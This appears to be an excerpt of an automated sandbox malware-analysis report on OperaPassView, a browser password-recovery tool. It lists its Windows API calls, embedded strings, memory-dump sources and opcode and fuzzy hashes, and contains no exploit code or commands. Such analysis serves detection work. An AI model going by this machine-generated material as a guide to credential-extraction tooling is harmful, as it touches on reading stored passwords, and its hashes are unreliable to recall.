                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_0000A7E6,00000000), ref: 0040A87B
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: 6f1b4270c9ccc508f8355bcb726170f444d9a0e27a8a615aa5e15917959b622a
                                        • Instruction ID: f1b79075368d7f3302d5c16def4a05d75f3a67994f6a28744877584c49ca99fa
                                        • Opcode Fuzzy Hash: 6f1b4270c9ccc508f8355bcb726170f444d9a0e27a8a615aa5e15917959b622a
                                        • Instruction Fuzzy Hash: DBC09B31594341D7C711DF609D45F1AB6A5BB69705F108D397151A40E0C7718024DA05

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 227 403cb3-403cc7 GetFileAttributesW
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00405371,?,00405428,00000000,?,00000000,00000208), ref: 00403CB7
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 7972945271e20ad746e209f09ada209896a6e2a7f5211ef5cd7ef869261963fc
                                        • Instruction ID: 8145a2f8594110c4b38fb2f1cb2a7870fdd634be9abe19054bc204d55fbc2e7d
                                        • Opcode Fuzzy Hash: 7972945271e20ad746e209f09ada209896a6e2a7f5211ef5cd7ef869261963fc
                                        • Instruction Fuzzy Hash: D1B01275210000CFCB1807349D8504D76525F44631720473CB033D00F0DB30CC60FA00
                                        APIs
                                          • Part of subcall function 00405BD5: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405BF7
                                          • Part of subcall function 00405BD5: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C8C
                                          • Part of subcall function 00403979: CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00406D71,?), ref: 0040398B
                                        • CloseHandle.KERNELBASE(?), ref: 00406FD2
                                          • Part of subcall function 0040429D: WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,00401E28,?,?,00000000,?), ref: 004042B4
                                          • Part of subcall function 004039D9: GetLastError.KERNEL32 ref: 004039ED
                                          • Part of subcall function 004039D9: _snwprintf.MSVCRT ref: 00403A1A
                                          • Part of subcall function 004039D9: MessageBoxW.USER32(?,?,Error,00000030), ref: 00403A33
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: File$??2@??3@CloseCreateErrorHandleLastMessageWrite_snwprintf
                                        • String ID:
                                        • API String ID: 630946551-0
                                        • Opcode ID: 2b7cd5079391e9d8e55a69fd821202ef4b4eaf6bdb143ee368991e79ac058e55
                                        • Instruction ID: 64313440329800f9810f307c06da1c2bcf1b1abd5f9e92a2a996e6603ed7f5a3
                                        • Opcode Fuzzy Hash: 2b7cd5079391e9d8e55a69fd821202ef4b4eaf6bdb143ee368991e79ac058e55
                                        • Instruction Fuzzy Hash: 7A31B571700101AFCB24AF69D889E5E7BA9AF48715F11447FF44BAB2D1CB389D90CB58
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 8563d17b0dccb6363eb3bc78f873fa2705b264ca117ec91251e6f4b542df73af
                                        • Instruction ID: 65d3eccb63d21b72dd929ec341c4414f44add3eddc226cefbfcf3e612d681bbc
                                        • Opcode Fuzzy Hash: 8563d17b0dccb6363eb3bc78f873fa2705b264ca117ec91251e6f4b542df73af
                                        • Instruction Fuzzy Hash: D8C08CB24107018FE7309F22C809323B3E4EF4072BF608C1D90D0920C1D77CD480CA08
                                        APIs
                                        • EmptyClipboard.USER32 ref: 00403B21
                                          • Part of subcall function 00403960: CreateFileW.KERNEL32(00000003,80000000,00000003,00000000,00000003,00000000,00000000,00403B2F,?), ref: 00403972
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00403B3E
                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00403B4F
                                        • GlobalLock.KERNEL32(00000000), ref: 00403B5C
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00403B6F
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00403B81
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00403B8A
                                        • GetLastError.KERNEL32 ref: 00403B92
                                        • CloseHandle.KERNEL32(?), ref: 00403B9E
                                        • GetLastError.KERNEL32 ref: 00403BA9
                                        • CloseClipboard.USER32 ref: 00403BB2
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: 0db2833bbf710edc4002946b08285dc8a0adc3005e02f9950c9bdb69ed800eb3
                                        • Instruction ID: 6180a8f7ef76292c9a3a20267fe9ddcfe1b9c844075d3e570f8186bb1a9e56aa
                                        • Opcode Fuzzy Hash: 0db2833bbf710edc4002946b08285dc8a0adc3005e02f9950c9bdb69ed800eb3
                                        • Instruction Fuzzy Hash: A6111C76900208FBD7105FE4ED8CA5E7E78EB04316F104276F906F1291DB749A05DA69
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00407FD1
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FE3
                                        • GetTempFileNameW.KERNEL32(?,0040DF40,00000000,00000000), ref: 00408006
                                        • OpenClipboard.USER32(00000000), ref: 00408030
                                        • GetLastError.KERNEL32 ref: 00408049
                                        • DeleteFileW.KERNEL32(00000000), ref: 00408068
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                        • String ID:
                                        • API String ID: 2014771361-0
                                        • Opcode ID: f38ebe6f4373c20ecce6a77353dd9227b6d8f424a55b39871be9a66ea2fac60e
                                        • Instruction ID: feb814f71b764bc893c0f87020e80892dea5429282502041cd83414046d32cac
                                        • Opcode Fuzzy Hash: f38ebe6f4373c20ecce6a77353dd9227b6d8f424a55b39871be9a66ea2fac60e
                                        • Instruction Fuzzy Hash: 1B115471600308DADB20DBA0DD89FDB77BD6B00704F00057AB555F21D1DF78A9C48B29
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004010F7
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401109
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040113F
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114C
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040117A
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040118C
                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040119E
                                        • SetCursor.USER32(00000000,?,?), ref: 004011A5
                                        • GetDlgItem.USER32(?,000003EE), ref: 004011C6
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011ED
                                        • SetBkMode.GDI32(?,00000001), ref: 004011F9
                                        • SetTextColor.GDI32(?,00C00000), ref: 00401207
                                        • GetSysColorBrush.USER32(0000000F), ref: 0040120F
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401230
                                        • EndDialog.USER32(?,?), ref: 00401265
                                        • DeleteObject.GDI32(?), ref: 00401271
                                        • GetDlgItem.USER32(?,000003ED), ref: 00401296
                                        • ShowWindow.USER32(00000000), ref: 0040129F
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012AB
                                        • ShowWindow.USER32(00000000), ref: 004012AE
                                        • SetDlgItemTextW.USER32(?,000003EE,00410E88), ref: 004012BF
                                        • SetWindowTextW.USER32(?,OperaPassView), ref: 004012CD
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004012E5
                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004012F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID: OperaPassView
                                        • API String ID: 829165378-491582363
                                        • Opcode ID: 44c3fea5d5aaf05a1ae1a793020c2e01a364cb6e94ecba1d8cb3666bd2b1d1f9
                                        • Instruction ID: a12a850719dd4dff80d3421bec8904e412416a354020c0a85a33f63fcb6912c6
                                        • Opcode Fuzzy Hash: 44c3fea5d5aaf05a1ae1a793020c2e01a364cb6e94ecba1d8cb3666bd2b1d1f9
                                        • Instruction Fuzzy Hash: E151A131500309EBDB22AF61DD85E6E7BB5EB04301F10853AFA56BA5F0C7749991DF08
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 00409855
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040986D
                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040988B
                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00409897
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0040989F
                                        • memset.MSVCRT ref: 004098C6
                                        • memset.MSVCRT ref: 004098E8
                                        • memset.MSVCRT ref: 00409901
                                        • memset.MSVCRT ref: 00409915
                                        • memset.MSVCRT ref: 0040992F
                                        • memset.MSVCRT ref: 00409944
                                        • GetCurrentProcess.KERNEL32 ref: 0040994C
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040996F
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 004099A1
                                        • memset.MSVCRT ref: 004099F4
                                        • GetCurrentProcessId.KERNEL32 ref: 00409A02
                                        • memcpy.MSVCRT(?,00410820,0000021C), ref: 00409A30
                                        • wcscpy.MSVCRT ref: 00409A53
                                        • _snwprintf.MSVCRT ref: 00409AC2
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 00409ADA
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409AE4
                                        • SetFocus.USER32(00000000), ref: 00409AEB
                                        Strings
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00409AB7
                                        • {Unknown}, xrefs: 004098DA
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                        • API String ID: 4111938811-1819279800
                                        • Opcode ID: 007ae5658ee67c496a52f2f0c58de467b094a3f2f94befcb10f6f0759da7e3ca
                                        • Instruction ID: 2e49bca4ceb178242313f370ad9eea42edebf1a9a74c4768f4a1d173b23e745a
                                        • Opcode Fuzzy Hash: 007ae5658ee67c496a52f2f0c58de467b094a3f2f94befcb10f6f0759da7e3ca
                                        • Instruction Fuzzy Hash: 4C7162B280011DEFDB21AB51DC85EDA7B6DEF08354F00417AF508B6191DB799E84CFA8
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00409FF7
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040A003
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A045
                                        • GetWindowRect.USER32(?,?), ref: 0040A050
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A064
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A072
                                        • 73A1A570.USER32(?,?,?), ref: 0040A0AB
                                        • wcslen.MSVCRT ref: 0040A0EB
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040A0FC
                                        • _snwprintf.MSVCRT ref: 0040A20C
                                        • SetWindowTextW.USER32(?,?), ref: 0040A220
                                        • SetWindowTextW.USER32(?,00000000), ref: 0040A23E
                                        • GetDlgItem.USER32(?,00000001), ref: 0040A274
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A284
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A292
                                        • GetClientRect.USER32(?,?), ref: 0040A2A9
                                        • GetWindowRect.USER32(?,?), ref: 0040A2B3
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040A2F9
                                        • GetClientRect.USER32(?,?), ref: 0040A303
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040A33B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ItemPointsText$Client$A570ExtentPoint32_snwprintfwcslen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 842022892-3046471546
                                        • Opcode ID: 2b7329c89531e0cdded902813a7e1d204c2fb6548433e42077877b92fc7e4063
                                        • Instruction ID: 00c6174f09e9d85bfc0101fa71ec0abfc3127ee496ceb4a79d8969e95b1e413f
                                        • Opcode Fuzzy Hash: 2b7329c89531e0cdded902813a7e1d204c2fb6548433e42077877b92fc7e4063
                                        • Instruction Fuzzy Hash: 40B1D071108301AFD710DFA9C984E6BBBE9FF88704F004A2DF699962A1DB75E814CF16
                                        APIs
                                          • Part of subcall function 00404CB2: LoadMenuW.USER32(00000000), ref: 00404CBA
                                        • SetMenu.USER32(?,00000000), ref: 00407C0A
                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00407C3D
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407C4C
                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 00407C59
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00407C90
                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00407CB7
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 00407D31
                                        • LoadIconW.USER32(00000000,00000066), ref: 00407D3A
                                        • GetFileAttributesW.KERNEL32(004113D8,/nosaveload), ref: 00407DAB
                                        • GetTempPathW.KERNEL32(00000104,004113D8), ref: 00407DBB
                                        • wcslen.MSVCRT ref: 00407DC2
                                        • wcslen.MSVCRT ref: 00407DD0
                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 00407E1D
                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 00407E56
                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 00407E69
                                        • DragAcceptFiles.SHELL32(?,00000001), ref: 00407E73
                                          • Part of subcall function 004023A5: wcslen.MSVCRT ref: 004023C2
                                          • Part of subcall function 004023A5: SendMessageW.USER32(00000000,00001061,00000000,?), ref: 004023E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSend$HandleLoadModulewcslen$Menu$AcceptAttributesClipboardCreateDragFileFilesFormatIconImagePathRegisterTempWindow
                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                        • API String ID: 2239506955-2103577948
                                        • Opcode ID: 0e5da505e621330b4a2d63a96c38446b6520448a779e9af2fe8d9db8e0b0c912
                                        • Instruction ID: 775989f50ab0ef32243f7c4ee976daec5aa22617c63f64fd310e10e69911fec0
                                        • Opcode Fuzzy Hash: 0e5da505e621330b4a2d63a96c38446b6520448a779e9af2fe8d9db8e0b0c912
                                        • Instruction Fuzzy Hash: BCB1D071904288EFEB11DF68C889BCE7FA5AF54300F044479FE48BB292C7B95544CBA9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font$Dk@
                                        • API String ID: 3143752011-2104739131
                                        • Opcode ID: 05fe2a801be0b1613b89f7bc63cbac08c18fe65105dbcbdeac47736927c7b34a
                                        • Instruction ID: bf39317571149bd1c72c16801d1d72e1aa836a3e5b857ede7f61db198e60d93d
                                        • Opcode Fuzzy Hash: 05fe2a801be0b1613b89f7bc63cbac08c18fe65105dbcbdeac47736927c7b34a
                                        • Instruction Fuzzy Hash: 8A31E4B2800309AED720EA559D86E6F73BCDF40714F60497FF214B21C2EB3E99558A5E
                                        APIs
                                        • memset.MSVCRT ref: 0040680B
                                        • memset.MSVCRT ref: 00406835
                                        • memset.MSVCRT ref: 0040684B
                                        • memset.MSVCRT ref: 00406861
                                        • _snwprintf.MSVCRT ref: 0040689A
                                        • wcscpy.MSVCRT ref: 004068E5
                                        • _snwprintf.MSVCRT ref: 00406972
                                        • wcscat.MSVCRT ref: 004069A4
                                          • Part of subcall function 0040ABC0: _snwprintf.MSVCRT ref: 0040ABE4
                                        • wcscpy.MSVCRT ref: 00406986
                                        • _snwprintf.MSVCRT ref: 004069E3
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s$Dk@
                                        • API String ID: 1277802453-447587558
                                        • Opcode ID: 9fb8add28beb6dedc95fe4ea4b1474876ec73735b2af5615a542e2dfb76c4588
                                        • Instruction ID: 3d811c55a601b9a54f9feaa86a49dc526349946696447936c9506965b807033a
                                        • Opcode Fuzzy Hash: 9fb8add28beb6dedc95fe4ea4b1474876ec73735b2af5615a542e2dfb76c4588
                                        • Instruction Fuzzy Hash: 4461BA71900208AFDF14EF54CC86EAE7B79EF04310F1044AAF915BA1E2DB79AA55CB49
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(?,?,004054A2,?,00000000), ref: 0040B077
                                        • 74D41560.VERSION(00000000,0040D9A8,004054A2,?,004054A2,00000000,?,00000000,?,004054A2,?,00000000), ref: 0040B09A
                                        • 74D41560.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040D9A8,004054A2,?,004054A2,00000000,?,00000000,?,004054A2,?,00000000), ref: 0040B0D7
                                        • _snwprintf.MSVCRT ref: 0040B0F7
                                        • wcscpy.MSVCRT ref: 0040B121
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 0040B1D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: D41560$??2@??3@_snwprintfwcscpy
                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                        • API String ID: 457946229-1542517562
                                        • Opcode ID: 74b9f49adb43e93f1b4629508957e663a3cbe10271b0bc0781c0a43f198b81b9
                                        • Instruction ID: c77ba3d7781d57481aec87ede9c1e58c24b0b5df3c8ac5c2dbc8897c88521a13
                                        • Opcode Fuzzy Hash: 74b9f49adb43e93f1b4629508957e663a3cbe10271b0bc0781c0a43f198b81b9
                                        • Instruction Fuzzy Hash: 2E4121B2900219BAD704EBA5DC81DDEB7BCEF48304F104537B915F3181DB78AA658BE9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
